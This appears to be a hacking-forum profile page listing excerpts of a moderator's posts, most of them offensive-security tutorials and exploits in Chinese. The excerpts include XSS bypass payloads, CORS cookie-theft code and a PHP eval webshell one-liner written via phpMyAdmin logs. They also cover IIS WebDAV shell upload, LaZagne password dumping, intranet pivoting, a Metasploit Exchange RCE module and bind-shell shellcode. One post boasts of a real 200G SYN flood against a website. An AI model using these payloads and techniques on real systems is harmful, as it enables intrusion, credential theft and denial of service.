Jump to content

H4CK

Moderators
  • Content Count

    26
  • Joined

  • Last visited

  • Days Won

    1

H4CK last won the day on October 12 2020

H4CK had the most liked content!

Community Reputation

4 Neutral

2 Followers

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

Enable
  1. XSS的fuzz payload字典 CORS CORS(corss orgin request sharing) 属于浏览器特性,用来实现跨域请求的。 https://medium.com/@baphemot/understanding-cors-18ad6b478e2b 1.盗取httponly cookie 2.缓存投毒 3.cookie炸弹 4.水坑攻击 盗取httponly cookie 设置httponly: setcookie("abc", "test", NULL, NULL, NULL, NULL, TRUE); //php 当网站使用了httponly的时候,会限制js读取cookie. 利用cors窃取cookie的条件: 服务器端进行设置: 设置Access-Control-Allow-Origin:xxx.com时 设置了Access-Control-Allow-Credentials:true 然后再寻找一个存在xss的并且允许跨域的域名来进行攻击。 主要利用代码就是一个XHR的一个异步请求。其中最重要的就是一定要设置 xhr1.withCredentials = true; 这样才会在跨域请求的时候带上cookie. <script >
  2. LadonExp生成器使用教程之IIS写权限漏洞利用,含环境配置、EXP生成、批量利用、Pyhton复现代码。 漏洞成因 该漏洞的产生原因来源于服务器配置不当造成,此漏洞主要是因为服务器开启了webdav的组件导致的可以扫描到当前的操作,具体操作其实是通过webdav的OPTION来查询是否支持PUT。 IIS配置 1 启用webdav组件 2 目录给写权限(为了方便直接eveyone完全写入权限) 3 脚本资源访问权限(不然MOVE失败即无法GetShell) 漏洞复现 使用LadonEXP可轻松复现此类漏洞,在Ladon改名前(Cscan)已复现过Tomcat,详情参考Tomcat CVE-2017-12615视频: https://github.com/k8gege/K8CScan/tree/master/Video LadonExp配置PUT 功能:上传123.TXT Target: http:/
  3. 根据题目Knife 猜想尝试用蚁剑连接 http://40b92ebd-5234-40b7-b2e0-3c42fb5ad000.node3.buuoj.cn/?Knife.php 密码:Syc 找到flag emmm确实白给的shell..
  4. xss原理 xss产生的原因是将恶意的html脚本代码插入web页面,底层原理和sql注入一样,都是因为js和php等都是解释性语言,会将输入的当做命令执行,所以可以注入恶意代码执行我们想要的内容 xss分类 存储型xss: js脚本代码会插入数据库,具有一定的持久性 反射型xss: js经过后端php等语言处理 dom型xss: 和反射型xss类似,但是不经过后端服务器的处理xss绕过总结:自身绕过<script>alert('xss')</script> //没有过滤 <Script>alert('xss')</Script> //大小写绕过 <scscriptript>alert('xss')</scscriptript> //嵌套绕过 <sc\x00ript>alert('xss')</sc\x00ript> //空字节绕过 " oonnclick=alert('XSS') // //闭合单双引号绕过(对于html实体输入的和过滤< >) 其他标签绕过 <a herf="javascript:alert(1)">s
  5. 什么是cookie cookie是曲奇饼,啊开个玩笑,cookie是每个用户登录唯一id和账号密码一样可以登录到网站,是的你没有听错cookie可以直接登录,至于服务器怎么设置cookie 和cookie存储这里就不说了,需的要自行百度 xss盗取cookie(dvwa演示) 学习xss时觉得啊这,不就是一个弹窗吗,有啥用,经过学习后发现xss的危害还是挺大的,弹窗的目的只是说明这里可以执行动态脚本,那就可以干很多事情了 环境配置 官网:http://www.dvwa.co.uk/ 下载地址:https://github.com/ethicalhack3r/DVWA 下载方式:zip下载或git https://github.com/ethicalhack3r/DVWA 下载完成放入http服务下即可 我使用的是phpstudy下载地址:https://m.xp.cn/ 设置接受盗取cookie方式 xss盗取的cookie肯定是要保存到我们自己的服务器上,可以设置一个接受cookie的php网页代码接受到请求携带cookie后保存到文件或者数据库中等都可以,当然也可以不设置存储,随便请求一个一个服务器网
  6. (Web安全防御、渗透测试、逆向破解可添加QQ 75960992 ) 导语: 利用SQL注入进行攻击来获取WebShell其实就是在向服务器写文件。(注意:这里我们需要得到网站的绝对路径)如何理解?引入余弦老哥的一句话: 黑客通过输入提交“特殊数据”,特殊数据在数据流的每个层处理,如果某个层没处理好,在输出的时候,就会出现相应层的安全问题。 也就是“输入输出”,余弦老哥举的这个例子就很精彩! 如果在存储层的数据库中没处理好,数据库的SQL解析引擎把这个“特殊数据”当做指令执行时,就产生SQL注入这样的安全问题,这段“特殊数据”可能长得如下这般: ' union select user, pwd, 1, 2, 3, 4 from users-- 为什么要进行SQL注入WebShell? 在所有常用的关系数据库管理系统(RDBMS)中均包含内置的向服务器文件系统写文件的功能,通过这些内置的功能,我们可以将自己的WEBshell写目录或文件进去。 什么是web shell? Web shell 我们可以把他拆开来看,web就是指在web服务器上,shell指的是用脚本语言编写的程序,那么,web shell就是用来管理服务器的一个工具,拥有对服务器进行操作的权限,又被称作web admin。
  7. 0x00前言 在拿到一台服务器的shell的时候,如果想要更进一步渗透测试,则需要进行内网渗透 而内网渗透的第一步就是挂代理,首先需要明确一个概念,在日常生活中常用vpn挂代理去google查资料,自己搭过vpn的人都知道,要在买的vps上搭建ss的服务器端,之后在自己电脑上下载ss的客户端,确定对应的加密协议和密码就能成功转发 而在内网渗透的流量转发是一个道理,是在拿到shell的服务器上使用工具让它变成代理的服务器端,之后在本机使用客户端工具进行连接 0x01流量转发工具 需要放在拿到shell的服务器的服务器端可使用 1.lcx 2.msf 3.cobalt Strike 4.earthworm 5.reGeorg 本地的客户端可以使用 windows 1.proxifier 2.SocksCap64 linux 1.proxychains 0x02 本次测试的环境 本次环境是公司搭的一个一层内网
  8. 使用laZagne来抓取密码 什么是laZagne呢,它是一个Pythono编写的一个很强大的密码抓取工具,有名的工具比如mimikatz,但是只能限于windwos情况下进行抓取,并且对于免杀方面的工作还要我们自己来做(但是msf等后渗透工具已经集成了,相对说利用较为方便)。 相对于laZagne来说就要差一点,因为它不仅支持跨平台,又因为使用python进行编译的,免杀的效果就相对于mimikatz来说就强一点。 项目地址 下载并且进行编译: 支持语言:Python2.x 先安装Python的模块 pip install pyinstaller 下载项目 git clone https://github.com/AlessandroZ/LaZagne.git 之后进入对应的文件夹(MAC/Linux/win) 进行编译 pyinstaller --onefile -w lazagne.py 然后就运行 laZagne.exe all就会枚举出浏览器存储的密码(我的浏览近百条明文密码都被抓取到了),至于想要抓取系统的密码hash就需要管理员的权限(mimikatz也是一样的),这个就不提这个了。 关于la
  9. 先我们用诸如下图的谷歌语法比如:inurl:index.php intitle:phpMyAdmin 以及shoudan,钟馗之眼等可以再网上搜到一大批暴露的phpmyadmin,看到个文章讲的比较详细https://blog.csdn.net/weixin_44023460/article/details/84925950 我们可以尝试弱口令爆破 ,爆破工具:http://ximcx.cn/post-49.html 进入phpmyadmin后首先用SHOW GLOBAL VARIABLES LIKE ‘%general%’;查询general_log功能是否开启,如果没有开启,我们用set global general_log=’on’ 把它开启 我们要想用sql 上传一句话木马就得知道网站的绝对路径,着要靠我们前期的信息收集,许多网站也会暴露phpinfo信息,在phpinfo里面我们可以看到绝对路径,类似的途径还有报错信息,以及其他暴露的配置文件等等 知道绝对路径我们可以使用 set global general_log_file=’/www/admin/localhost_80/wwwroot/ssr.php’;SELECT ‘<?php eval($_POST["ssr"]);?>
  10. (渗透测试、APP逆向破解 合法等保操作等可以加Qq合作 75960992) 0X00 前言 团队A师傅发来个站,问我有没有得搞 正好在搞其他的站,卡住了,开干换个思路。 0x01 信息收集 开burp抓了下包,目标设置了url重写,开了报错,我们随意输入一个控制器就直接报错。 获取到web绝对路径。 抓包发现这样的请求 随手试了一下burpsuite的dnslog,发现请求过去并回显了,猜测后端使用file_get_contens来获取。 一个可回显ssrf,有什么用呢? 打内网? 尝试file协议,尝试读取文件,发现可以读。 但发现返回的内容不完整,猜测有截断,用php://filter协议base64编码一下绕过读取。 解码 有一个任意文件读取有什么用呢? 在这之前,其实是有用nmap扫了一下其他端口 开了挺多端口的,一个个测了一下发现999端口开着phpmy
  11. 大家好,我是论坛服务器的赞助商,我们做渗透测试及安保业务。我的QQ是 75960992 今天给大家带来一个故事,白嫖怪的QQ是115**281 看着是挺厉害的,做人不行。 起因:被金融诈骗公司诈骗了钱 他说是五十万 实际上我不知道是多少钱。 于是他说已经公安部立案,但进展不快。希望我们做一下 说是被骗了,希望我们能先做后付款。好的 我们演示能力给她看。 后面回到团队叫小伙伴一起找漏洞 发现三个漏洞 分别 注入XSS 另外就是后台登录的时候抓包可以直接跳过 不过里面权限不太够 需要提权操作。 这白嫖怪说的是让他停一周,去协商就行 于是我们用了简单的DD SYN 发出200G 直接就炸了。 下面看我操作图片 网站黑洞中的时候,他说需要面交,本来拒绝的,后面看到那么真诚 想帮他一把。他买票过来了 后面想着 他这种狗急跳墙的人应该不会善罢甘休。 没想到真的。这种狗急跳墙的人很容易出事,没让他来,他就说我不能做什么的。 后面自然是谈崩了,这种人真的没必要,说漏洞 说渗透 我叫人也做了,说干站 也干了,非得要提出这些无理的要求。我一毛钱没收到,还非得好像给了我几百万一
  12. ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Powershell def initialize(info = {}) super( update_info( info, 'Name' => 'Microsoft Exchange Server DlpUtils AddTenantDlpPolicy RCE', 'Description' => %q{ This vulnerability allows remote attackers to execute arbitrary
  13. # Title: Linux/ARM (Raspberry Pi) - Bind (0.0.0.0:1337/TCP) Shell (/bin/sh) + Null-Free Shellcode (100 bytes) # Date: 2020-06-09 # Architecture: armv6l GNU/Linux # Website: http://www.theanuragsrivastava.com # Author: Anurag Srivastava /* bindwala: file format elf32-littlearm Disassembly of section .text: 00010054 <_start>: 10054: e28f3001 add r3, pc, #1 10058: e12fff13 bx r3 1005c: 2001 movs r0, #1 1005e: 1c01 adds r1, r0, #0 10060: 3001 adds r0, #1 10062:
  14. # Exploit Title: Linux/x86 - execve "/bin/sh" (10 bytes) # Google Dork: None # Exploit Author: cybersaki # Vendor Homepage: None # Software Link: None # Version: None # Tested on: Kali linux 2020.2a i386 x86 # CVE : none # Shellcode-length : 10 # SLAE-id : Purchased | chivaljazz@gmail.com # Reference : http://shell-storm.org/shellcode/files/shellcode-811.php /******************************************************************************* global _start section .text _start: xor eax, eax ; zero our eax push eax ; push 0x68732f2f mov eax, 0xd0e65e5e ror eax, 1
×
×
  • Create New...

Important Information

Dear visitors, please read and agree to our website rules before visiting our website!Guidelines